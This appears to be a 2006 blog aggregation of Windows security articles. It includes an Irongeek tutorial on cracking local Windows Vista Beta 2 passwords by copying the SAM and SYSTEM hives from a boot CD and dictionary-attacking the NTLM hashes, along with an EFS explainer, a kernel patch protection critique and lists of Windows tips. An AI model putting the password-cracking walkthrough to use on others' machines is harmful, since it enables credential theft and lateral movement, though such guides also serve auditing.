SummaryAs security gets built into the technology solutions IT professionals provide, it becomes important to find ways to consolidate and to innovate time saving administration options. This is what Microsoft is promising to do with Forefront in the next few years starting with products they already have that integrate security into your environment. In this part one of Microsoft Forefront, we looked at some of the products like MOM that form part of the new, consolidated, simple to implement security suite from Microsoft. In the second article we will take a look at the remaining products that complete the security suite.

If you would like to be notified of when Ricky Magalhaes releases part two of this article series, please sign up to our WindowSecurity.com Real-Time Article Update newsletter.

About Ricky M. MagalhaesRicky M. Magalhaes is a security specialist that has worked as a consultant and IT technical specialist for the past 8 years. He has been primarily responsible for implementation and design of Security, network architecture, communications, network infrastructure and Security R&D for many South African organizations that he works with. He is a windows 9x product specialist and has been working with the windows product since version win 3.11. He has also written articles on security for www.windowsecurity.com ; www.ISAserver.org ; www.governmentsecurity.com and many other well known security and technology websites.

Click here for Ricky M. Magalhaes's section.

Cracking Windows Vista Beta 2 Local Passwords (SAM and SYSKEY)

2006-11-21T20:49:00.001-08:00

One of the common things folks stumble across my site in search of is information on cracking local Windows 2000/XP passwords. I've created quite a bit of content on the subject over the years, and if you want a broader understanding of the topic please visit these resources:

Text:
http://www.irongeek.com/i.php?page=security/localsamcrack
http://www.irongeek.com/i.php?page=security/localsamcrack2

Video:
http://www.irongeek.com/i.php?page=videos/samdump2auditor
http://www.irongeek.com/i.php?page=videos/LocalPasswordCracking

While I was playing around with Windows Vista Beta 2 I decided to see if some of the old tools for cracking local account password still worked. It would seem that Microsoft has changed how the SAM file and SYSKEY work in Vista so none of my old tricks that use to work with NT 4/2000/XP functioned anymore. I quickly found that most of the current tools as of this writing(Ophcrack 2.3, Cain 2.9, SAMInside 2.5.7.0, Pwdump3) no longer work, which I have mixed feelings about. It's nice to see the extra level of security, but cracking local passwords was always sort of fun as well as useful from time to time. When I tried to crack local passwords extracted from copied SAM and SYSTEM hive files I would get the following errors:

Ophcrack:
"Error: no valid hash was found in this file"

Cain:
"Couldn't find lsa subkey in the hive file."

While tools like Sala’s Password Renew could still be use from a Bart’s PE boot CD to change any Vista password you wanted, or to create new admin accounts entirely, sometime you need to know the current administrator password. Three reasons to want to know a current Windows password without changing it are:

1. An attacker doesn’t want to tip off the system administrators. If they notice that the old admin password no longer works they will get a bit suspicious don’t you think?

2. The same account passwords may be used on other systems on the network. If the attacker can crack one machine's admin password that same password may allow the attacker to gain access to other boxes on that LAN that they don't have direct physical access to.

3. To gain access to data that has been encrypted using Windows EFS (Encrypted File System). Changing an accounts password may cause this data to be lost, though I think Sala's tool may be able to do this without losing the encryption key since it uses a Windows service to change the local password.

Also of note for those interested in cracking Windows Vista passwords, it seems that Vista Beta 2 disables LM hash storage by default, so all you can get is the NTLM hash which can be much harder to crack for reasons stated in my other articles. Another thing I want to make you aware of is the new BitLocker feature of Windows Vista can make pretty much everything in this article useless if it's enabled, but that's a topic for another time.

I thought all was lost on the Vista password cracking front, but after doing some web searching I found that you can still crack the local passwords if you have the right tools. It would seem that the folks from Elcom Soft have added support for Vista SAM and SYSTEM hives into their "Proactive Password Auditor 1.61" tool. Unfortunately PPA is a commercial application, but they do offer a sixty day evaluation version that does not seem to be overly crippled. Since Elcom figured out how to do it I'm sure that soon the free tools like Cain and Ophcrack will also. What follows are the basic steps to crack/audit local Windows Vista Beta 2 passwords with Proactive Password Auditor.

You need to be able to read the drive Windows Vista is installed on. For NTFS drives I’ve used the Knoppix ( http://www.knoppix.org/ ) and PE Builder ( http://www.nu2.nu/pebuilder/ ) boot CDs with good success. The first step is to boot from a CD-ROM and copy off the SAM and SYSTEM files in C:\WINDOWS\system32\config (you may have to get a slightly older version of them from C:\WINDOWS\config\RegBack instead, also keep in mind that C: may not be your system drive in which case substitute the appropriate drive letter ). The SAM and SYSTEM files are likely to be too large to fit on a 1.44MB floppy unless you compress them using Gzip in Linux or some Windows compression tool in Bart's PE. You could also copy them to some other form of removable media (Thumb drive anyone?) or upload them across the network to an FTP or file server that you have access to. For the Gzip/Floppy instructions read my first tutorial linked at the top of this article. It modern times it's usually easiest to just drag and drop the SAM and SYSTEM to a file server using the GUI that comes with your Boot CD.

Now that you have a copy of the SAM and SYSTEM hive files start up Proactive Password Auditor and follow these steps:

1. Choose the radio button labeled "Registry files (SAM, SYSTEM)" under the hashes tab, then click dump.

2. Choose the SYSTEM and SAM files you want to use, then click the "Dump" button.

3. During the Dump phase Proactive Password Auditor automatically tries a simple brute-force attack so your passwords may already be cracked. If not, choose the attack type, and set the hash type to "NTLM attack" since there are no LM hashes. I'll choose the Dictionary attack, click the the "Dictionary list..." button under the "Dictionary" tab and point it at the word list that comes with Cain (C:\Program Files\Cain\Wordlists\Wordlist.txt).

4. Make sure the check boxe(s) next to the account(s) you want to try to crack are selected.

5. Now it's just a matter of clicking the menu item "Recovery->Start recovery", waiting, and hoping for the best.

Assuming the password is simple enough you should now have a cracked password to work with. Keep in mind that there's no guarantee that you will be able to crack any passwords at all. If the password is not in your dictionary you will have to resort to a Brute-force attack which could take forever if the password was chosen well, but this should get you going in the right direction. Also, if you have large Rainbow tables on your system give them a shot as Proactive Password Auditor supports this cracking method. I plan to update this page once Cain or Ophcrack support Vista. Please send me an email if you notice before I do that any of the free tools have implemented Vista SAM/SYSTEM file support. If this tutorial was of any help to you, please visit some of the sponsor links and help support the site. Thanks.

Useful links:
Sala’s Password Renew
http://www.sala.pri.ee/

Proactive Password Auditor 1.61
http://forum.eviloctal.com/read.php?tid=23881

Bart’s Pe Builder:
http://www.nu2.nu/pebuilder/

Oxid.it’s Cain Web Page:
http://www.oxid.it/cain.html

Ophcrack
http://forum.eviloctal.com/read.php?tid=23882

Understanding Encrypting File System

2006-11-21T20:48:00.001-08:00

In this article we will take a look at the new and improved EFS.
New and Improved EFS
EFS has been around for quite some time within a Windows environment, but it has grown up a bit in Windows XP and Server 2003. EFS, Encrypting File System, is an excellent way to help protect data that is stored on a server or desktop. EFS is one of many security mechanisms that Microsoft provides in the buffet line of security measures meant to help protect data that is stored and transferred across the network. If you attempted to use EFS in Windows 2000, but found it somewhat clumsy or limited, you will are sure to be impressed with the new features that are now available in Windows XP and Server 2003. If nothing else, you should be aware of the changes and keep the prospect of using EFS in the forefront of your arsenal as a security measure when you are faced with critical data that must be protected.

What EFS is and What EFS is Not
EFS does help protect data as it is stored on a file server. Obviously this is ideal for laptops that store data for traveling users as the move from city to city, then back to the office. If a laptop is stolen, it takes some gymnastics to get into the operating system, as well as into the encrypted files that are protected within the file structure. EFS is not intended to be as robust as using physical devices that encrypt files, but it does provide for a significant increase to security compared to typical storage of files on a laptop.

EFS is not designed, nor does it provide, a solution to encrypt files that are sent across the network. When a file that is stored using EFS is sent across the network, it is first decrypted, then sent on the wire. This does expose the file to possible interception and attacks if you have not implemented some other form of protection for data on the wire. Microsoft provides the robust solution of IPSec within Windows 2000 and greater that can encrypt files as they are sent from point-to-point on the network.

If you are using EFS or EFS in combination with IPSec, you might see a hit to performance when accessing the protected files. The level of performance hit depends on many factors, including server hardware, network structure, network performance, level of protection used in IPSec, and the files that are being accessed. Of course, if the data is critical, a hit to performance resulting in a lag time will not be a huge concern.

Data Recovery
If you are familiar with how Windows 2000 dealt with EFS data recovery, you will be a little shocked at how Windows XP and Server 2003 handle the issue. First off, EFS data recovery is a key concept when using EFS, in case the original user that encrypts the file loses the private key for decryption or worse, maliciously encrypts files before leaving the company.

Windows 2000 domains by default configures the Administrator account as the data recovery agent (DRA). This can be seen within the Default Domain Policy, as shown in Figure 1. The idea is that when a user encrypts a file, the DRA is also given the private key so that it can decrypt the files in case of an emergency or disaster. There is quite a process that needs to be followed to decrypt these files, which can be understood by reading the article named “Implementing the Encrypting File System in Windows 2000” on TechNet.

Figure 1: DRA configured in the Default Domain Policy

If you ever want to “cripple” EFS for all domain computers in an Active Directory enterprise, you can just delete the DRA certificate from within the Default Domain Policy. This will in essence disallow any encryption, because Windows 2000 requires a DRA be configured for any encryption to occur. I do suggest that you back up this certificate before deleting it, although you can regenerate it if you have deleted it without backing it up first.

Windows XP and Server 2003 approach the DRA in a different manner. These operating systems don’t require a DRA. These operating systems can get by without a DRA, which can put the encrypted files in jeopardy if the original ability to decrypt the files is lost. The benefit is that there does not need to be a DRA configured within Active Directory or on the local system for these operating systems to perform the encryption of files.

If you desire to disable encryption of files enterprise wide, you won’t be able to perform the same steps that you did with a Windows 2000 environment. The deletion of the DRA certification won’t do any good, since EFS no longer requires it for Windows XP and Server 2003. To disable EFS for Windows XP and Server 2003, you will need to go into the Default Domain Policy and configure the “Allow users to encrypt files using Encrypting file System (EFS)” check box, as shown in Figure 2.

Figure 2: Option to disable EFS for Windows XP and Server 2003

Multi-user Access to Encrypted Files
One of the major stumbling blocks of using EFS in a corporate environment with Windows 2000 was the limitation of only having a single user having access to encrypted files. In essence, the user that performed the encryption was the only user that could subsequently access the files. This limited the files that could be encrypted, omitting any files that were shared amongst multiple users in the enterprise.

Windows XP and Server 2003 altered this behavior by allowing multi-user access to encrypted files. I feel that this new feature of EFS makes it a viable solution for a corporate environment, which before limited EFS to only be an option for a laptop. There are some configurations and gyrations required to get multiple users configured to use the same encrypted files, but it is not beyond the capabilities of even the most inexperienced network administrator. The key is that the user being configured to access the encrypted file must have a valid EFS certificate stored in Active Directory. This is required based on how the object picker searches for Active Directory for users that have the userCertificate attribute filled with a certificate. The interface that is used for selecting additional users that can access an encrypted file is shown in Figure 3.

Figure 3: Multiple users can be configured to access the same encrypted file

Encryption of Offline Files
Another benefit of using Windows XP and Server 2003 is that files that are configured to be accessed offline when a user travels can be encrypted. This provides additional security and flexibility over Windows 2000, which forced users to keep a copy of the files on the laptop separate from offline files, if they wanted to encrypt the files while they traveled. The process to encrypt offline files is rather simple, once you get the offline files configured and working the way you want. The option exists within the Offline Files configuration settings within Windows Explorer. To access the option, you simply need to go to the Tools – Folder Options menu. From there, select the Offline Files tab, as shown in Figure 4.

Figure 4: Offline Folders tab in Windows XP allows for encryption of offline files

Summary
As you can see, EFS has grown up quite a bit from Windows 2000. Now, it is ready for a corporate environment and solves the nagging problems that EFS imposed in Windows 2000. The modification of how EFS uses and relies upon the DRA is a radical change, especially for management of the DRA. You do need to be cautious of your choices here, but at least you have options. Multi-user EFS by far is the biggest new feature of the new and improved EFS. Having multiple users having access to the same encrypted files allows for use of EFS for your HR, financial, and other essential data as it is stored on the server. For your traveling users, having the ability to use offline files and EFS in conjunction with one another makes administration easy, and the solution seamless. Be sure to test all of your solutions using EFS before rolling it out corporate wide, but you will see that EFS is now ready for use across the board.

About Derek Melber
Derek Melber , MCSE, MVP, CISM

Derek is the Director of Compliance Solutions for DesktopStandard. Derek has written the only books on auditing Windows security available at www.theiia.org’s bookstore. Derek also wrote the Group Policy Guide for MSPress, which is the only book Microsoft has written regarding Group Policy. If you have a question for Derek, contact him at derekm@desktopstandard.com.

Microsoft's Kernel Patch Protection Endangers Third-party Security Software Vendors

2006-11-21T20:46:00.002-08:00

Overview PDF version
http://www.agnitum.com/news/Kernelpatch.pdf

New security measures introduced by Microsoft under the name "Kernel Patch Protection" are being presented to the world as bringing a new level of security to users. This security will be provided by a combination of Microsoft security software and Windows operating system kernel design.

Agnitum security experts have analyzed these new measures, and it is their informed opinion that these measures will actually cause more harm than good, for two primary reasons:

It will be more complicated for third-party security software companies to install and maintain their software on Windows PCs. In some circumstances, kernel patch protection may even block the installation of third-party security software.

It will be easier for hackers to share and use this new technology than for legitimate software developers.

Let's take a look behind the scenes and see why this is the case.

Technical Background
To provide proactive protection, security software solutions need to get control over low-level system activities like file and registry operations.

To achieve this level of control, one approach uses a documented API provided by Microsoft. However, this API does not allow ISVs (independent software vendors) to control system activity pre-emptively and on the fly. It limits the number of file and registry operations that can be controlled. It does not allow control of process memory modification and imposes a number of other restrictions. This does not help independent software vendors to provide system protection using native interfaces.

An alternate approach requires modification or replacement of code or critical structures in the kernel of the Microsoft Windows operating system using internal system calls - so-called kernel patching. Essentially, kernel patching bypasses actual Windows kernel code to invoke third-party code. However, this approach opens Windows to attack by malicious third-party code as well as legitimate attempts to extend Windows functionality.

One of the most commonly used approaches to implementing proactive protection involves changing and monitoring the Service Dispatch Table (SDT), which is used by the OS to transfer control from user-mode to kernel (low-level system mode). Developers sometimes patch the kernel by changing the service number in the SDT, and when a call is made to invoke a system service, the third-party code is invoked instead of the kernel code.

Security vendors, including Agnitum, often use this approach. Unlike other techniques suggested by Microsoft, this approach enables third-party software to protect the OS by gaining full control over file and registry operations. Microsoft, however, prefers that developers not use this approach. In fact, the company has gone so far, in the x64 versions of Windows, as to prevent call redirection involving 32-bit SDT pointers. Sadly, this poses no problem for hackers, as there are unused areas in the kernel code that can be used to create so-called "connectors." In theory, Windows Patñh Guard should interrupt this process after doing a memory space check, but hackers already know how to disable this protection.

And now along comes Kernel Patch Protection
In a recent update, Microsoft removed the ability for developers to legitimately change the service number in the SDT, introducing so-called kernel patch protection for x64-based versions of Windows Server 2003 SP1, Windows XP and later versions of Windows for x64-based systems.

Microsoft believes kernel patch protection defends code and critical structures in the Windows kernel against modification by unknown code or data. Kernel patch protection stores and periodically verifies checksums of specific kernel memory areas (network components); if a checksum mismatch is found, the result is the dreaded Blue Screen of Death (BSOD). According to Microsoft, this technique should prevent SDT modification and thwart the intentions of a number of rootkits.

Research by Agnitum security experts has determined that, in practice, kernel patch protection does not prevent hackers from reverse engineering specific OS code areas to re-acquire the desired capabilities. While it does disable compatibility with future kernel versions, quality-assurance is not a big concern for most malware writers.

So where does this leave legitimate security software developers?
Microsoft seems to be saying that it is enough to use just standard built-in protection tools. Agnitum and other third-party security developers would strongly disagree with that position. Third-party security solutions create a much-needed additional level of protection, and having a variety of these tools available empowers the user while handicapping the hacker. Simply put, it is much harder for malware writers to adapt malicious code for different protection mechanisms from multiple vendors than it is to attack a single-vendor solution that purports to be a universal fix.

Kernel patch protection restricts ISVs to two alternatives:

Use the "legitimate" API provided by Microsoft and be unable to implement proactive system protection.

Use "shady" methods - in effect, use hacker techniques to compete with Microsoft and enforce a level playing field.

Kernel patch protection does complicate rootkit writers' lives. But they can use quick-and-dirty techniques, because they don't need to worry about compatibility with existing system and application software.

Besides, does it make sense to consider triggering a Blue Screen of Death as a way to defend against rootkits?

Under Microsoft's proposed solution, a rootkit that could previously be detected by and remedied with anti-virus software will now cause the BSOD. The same result will occur after installation of security software that is not compatible with kernel patch protection technology.

The security experts at Agnitum believe this move by Microsoft is designed to force users to rely on Microsoft and only Microsoft for Windows security, removing the option to use third-party security solutions that, if past experience is anything to go by, are likely to be more robust and provide better protection than Microsoft offerings.

We believe that Microsoft owes users a better solution.

For further reference, see
http://www.microsoft.com/whdc/driver/kernel/64bitpatch_FAQ.mspx
http://support.microsoft.com/kb/914784

by Igor Pankov,
Agnitum ltd.,
www.agnitum.com

Press contacts:
pr@agnitum.com

112 Windows Run Commands(112条Windows运行命令)

2006-11-21T20:46:00.001-08:00

Wanted to Browse fast in windows. Remember these commands.
This will really save a lot of time of your. There are many
commands which you might have never seen or never knew.
There are certain properties of windows which you hardly know
exist in windows. Here is a list of 112 run commands.

Windows Run Commands
Accessibility Controls access.cpl
Add Hardware Wizard hdwwiz.cpl
Add/Remove Programs appwiz.cpl
Administrative Tools control admintools
Automatic Updates wuaucpl.cpl
Bluetooth Transfer Wizard fsquirt
Calculator calc
Certificate Manager certmgr.msc
Character Map charmap
Check Disk Utility chkdsk
Clipboard Viewer clipbrd
Command Prompt cmd
Component Services dcomcnfg
Computer Management compmgmt.msc
timedate.cpl ddeshare
Device Manager devmgmt.msc
Direct X Control Panel (If Installed)* directx.cpl
Direct X Troubleshooter dxdiag
Disk Cleanup Utility cleanmgr
Disk Defragment dfrg.msc
Disk Management diskmgmt.msc
Disk Partition Manager diskpart
Display Properties control desktop
Display Properties desk.cpl
Display Properties (w/Appearance Tab Preselected) control color
Dr. Watson System Troubleshooting Utility drwtsn32
Driver Verifier Utility verifier
Event Viewer eventvwr.msc
File Signature Verification Tool sigverif
Findfast findfast.cpl
Folders Properties control folders
Fonts control fonts
Fonts Folder fonts
Free Cell Card Game freecell
Game Controllers joy.cpl
Group Policy Editor (XP Prof) gpedit.msc
Hearts Card Game mshearts
Iexpress Wizard iexpress
Indexing Service ciadv.msc
Internet Properties inetcpl.cpl
IP Configuration (Display Connection Configuration) ipconfig /all
IP Configuration (Display DNS Cache Contents) ipconfig /displaydns
IP Configuration (Delete DNS Cache Contents) ipconfig /flushdns
IP Configuration (Release All Connections) ipconfig /release
IP Configuration (Renew All Connections) ipconfig /renew
IP Configuration (Refreshes DHCP & Re-Registers DNS) ipconfig /registerdns
IP Configuration (Display DHCP Class ID) ipconfig /showclassid
IP Configuration (Modifies DHCP Class ID) ipconfig /setclassid
Java Control Panel (If Installed) jpicpl32.cpl
Java Control Panel (If Installed) javaws
Keyboard Properties control keyboard
Local Security Settings secpol.msc
Local Users and Groups lusrmgr.msc
Logs You Out Of Windows logoff
Microsoft Chat winchat
Minesweeper Game winmine
Mouse Properties control mouse
Mouse Properties main.cpl
Network Connections control netconnections
Network Connections ncpa.cpl
Network Setup Wizard netsetup.cpl
Notepad notepad
Nview Desktop Manager (If Installed) nvtuicpl.cpl
Object Packager packager
ODBC Data Source Administrator odbccp32.cpl
On Screen Keyboard osk
Opens AC3 Filter (If Installed) ac3filter.cpl
Password Properties password.cpl
Performance Monitor perfmon.msc
Performance Monitor perfmon
Phone and Modem Options telephon.cpl
Power Configuration powercfg.cpl
Printers and Faxes control printers
Printers Folder printers
Private Character Editor eudcedit
Quicktime (If Installed) QuickTime.cpl
Regional Settings intl.cpl
Registry Editor regedit
Registry Editor regedit32
Remote Desktop mstsc
Removable Storage ntmsmgr.msc
Removable Storage Operator Requests ntmsoprq.msc
Resultant Set of Policy (XP Prof) rsop.msc
Scanners and Cameras sticpl.cpl
Scheduled Tasks control schedtasks
Security Center wscui.cpl
Services services.msc
Shared Folders fsmgmt.msc
Shuts Down Windows shutdown
Sounds and Audio mmsys.cpl
Spider Solitare Card Game spider
SQL Client Configuration cliconfg
System Configuration Editor sysedit
System Configuration Utility msconfig
System File Checker Utility (Scan Immediately) sfc /scannow
System File Checker Utility (Scan Once At Next Boot) sfc /scanonce
System File Checker Utility (Scan On Every Boot) sfc /scanboot
System File Checker Utility (Return to Default Setting) sfc /revert
System File Checker Utility (Purge File Cache) sfc /purgecache
System File Checker Utility (Set Cache Size to size x) sfc /cachesize=x
System Properties sysdm.cpl
Task Manager taskmgr
Telnet Client telnet
User Account Management nusrmgr.cpl
Utility Manager utilman
Windows Firewall firewall.cpl
Windows Magnifier magnify
Windows Management Infrastructure wmimgmt.msc
Windows System Security Tool syskey
Windows Update Launches wupdmgr
Windows XP Tour Wizard tourstart
Wordpad write

您不一定知道的20个Windows XP小秘密(英文资料)

2006-11-21T20:45:00.000-08:00

http://www.realtechnews.com/posts/3607

1. It boasts how long it can stay up. Go to the Command Prompt in the Accessories menu from the All Programs start button option, and then type ’systeminfo’. The computer will produce a lot of useful info, including the uptime. If you want to keep these, type ’systeminfo > info.txt’. This creates a file called info.txt you can look at later with Notepad. (Professional Edition only).

2. You can delete files immediately, without having them move to the Recycle Bin first. Go to the Start menu, select Run… and type ‘gpedit.msc’; then select User Configuration, Administrative Templates, Windows Components, Windows Explorer and find the Do not move deleted files to the Recycle Bin setting. Set it. Poking around in gpedit will reveal a great many interface and system options, but take care — some may stop your computer behaving as you wish. (Professional Edition only).

3. You can lock your XP workstation with two clicks of the mouse. Create a new shortcut on your desktop using a right mouse click, and enter ‘rundll32.exe user32.dll,LockWorkStation’ in the location field. Give the shortcut a name you like. That’s it — just double click on it and your computer will be locked. And if that’s not easy enough, Windows key + L will do the same.

4. XP hides some system software you might want to remove, such as Windows Messenger, but you can make it show everything. Using Notepad or Edit, edit the text file /windows/inf/sysoc.inf, search for the word ‘hide’ and remove it. You can then go to the Add or Remove Programs in the Control Panel, select Add/Remove Windows Components and there will be the software and you can now uninstall it.

5. For those skilled in the art of DOS batch files, XP has a number of interesting new commands. These include ‘eventcreate’ and ‘eventtriggers’ for creating and watching system events, ‘typeperf’ for monitoring performance of various subsystems, and ’schtasks’ for handling scheduled tasks. As usual, typing the command name followed by /? will give a list of options.

6. XP has IP version 6 support — the next generation of IP. Unfortunately this is more than your ISP has, so you can only experiment with this on your LAN. Type ‘ipv6 install’ into Run… (it’s OK, it won’t ruin your existing network setup) and then ‘ipv6 /?’ at the command line to find out more. If you don’t know what IPv6 is, don’t worry.

7. You can at last get rid of tasks on the computer from the command line by using ‘taskkill /pid’ and the task number, or just ‘tskill’ and the process number. Find that out by typing ‘tasklist’, which will also tell you a lot about what’s going on in your system.

8. XP will treat Zip files like folders, which is nice if you’ve got a fast machine. On slower machines, you can make XP leave zip files alone by typing ‘regsvr32 /u zipfldr.dll’ at the command line. If you change your mind later, you can change things back by typing ‘regsvr32 zipfldr.dll’.

9. XP has ClearType — Microsoft’s anti-aliasing font display technology — but doesn’t have it enabled by default. It’s well worth trying, especially if you were there for DOS and all those years of staring at a screen have given you the eyes of an astigmatic bat. To enable ClearType, right click on the desktop, select Properties, Appearance, Effects, select ClearType from the second drop-down menu and enable the selection. Expect best results on laptop displays. If you want to use ClearType on the Welcome login screen as well, set the registry entry HKEY_USERS/.DEFAULT/Control Panel/Desktop/FontSmoothingType to 2.

10. You can use Remote Assistance to help a friend who’s using network address translation (NAT) on a home network, but not automatically. Get your pal to email you a Remote Assistance invitation and edit the file. Under the RCTICKET attribute will be a NAT IP address, like 192.168.1.10. Replace this with your friend’s real IP address — they can find this out by going to www.whatismyip.com — and get them to make sure that they’ve got port 3389 open on their firewall and forwarded to the errant computer.

11. You can run a program as a different user without logging out and back in again. Right click the icon, select Run As… and enter the user name and password you want to use. This only applies for that run. The trick is particularly useful if you need to have administrative permissions to install a program, which many require. Note that you can have some fun by running programs multiple times on the same system as different users, but this can have unforeseen effects.

12. Windows XP can be very insistent about you checking for auto updates, registering a Passport, using Windows Messenger and so on. After a while, the nagging goes away, but if you feel you might go insane before that point, run Regedit, go to HKEY_CURRENT_USER/Software/Microsoft/Windows/Current Version/Explorer/Advanced and create a DWORD value called EnableBalloonTips with a value of 0.

13. You can start up without needing to enter a user name or password. Select Run… from the start menu and type ‘control userpasswords2′, which will open the user accounts application. On the Users tab, clear the box for Users Must Enter A User Name And Password To Use This Computer, and click on OK. An Automatically Log On dialog box will appear; enter the user name and password for the account you want to use.

14. Internet Explorer 6 will automatically delete temporary files, but only if you tell it to. Start the browser, select Tools / Internet Options… and Advanced, go down to the Security area and check the box to Empty Temporary Internet Files folder when browser is closed.

15. XP comes with a free Network Activity Light, just in case you can’t see the LEDs twinkle on your network card. Right click on My Network Places on the desktop, then select Properties. Right click on the description for your LAN or dial-up connection, select Properties, then check the Show icon in notification area when connected box. You’ll now see a tiny network icon on the right of your task bar that glimmers nicely during network traffic.

16. The Start Menu can be leisurely when it decides to appear, but you can speed things along by changing the registry entry HKEY_CURRENT_USER/Control Panel/Desktop/MenuShowDelay from the default 400 to something a little snappier. Like 0.

17. You can rename loads of files at once in Windows Explorer. Highlight a set of files in a window, then right click on one and rename it. All the other files will be renamed to that name, with individual numbers in brackets to distinguish them. Also, in a folder you can arrange icons in alphabetised groups by View, Arrange Icon By… Show In Groups.

18. Windows Media Player will display the cover art for albums as it plays the tracks — if it found the picture on the Internet when you copied the tracks from the CD. If it didn’t, or if you have lots of pre-WMP music files, you can put your own copy of the cover art in the same directory as the tracks. Just call it folder.jpg and Windows Media Player will pick it up and display it.

19. Windows key + Break brings up the System Properties dialogue box; Windows key + D brings up the desktop; Windows key + Tab moves through the taskbar buttons.

20. Windows XP secretly KNOWS that the average user has no idea what they are doing. Therefore, it doesn’t let you do really stupid things like deleting the windows directory (at least not without spending several hours convincing it that you REALLY want to do this). Oh yeah, and internet explorer kinda sucks, get Firefox.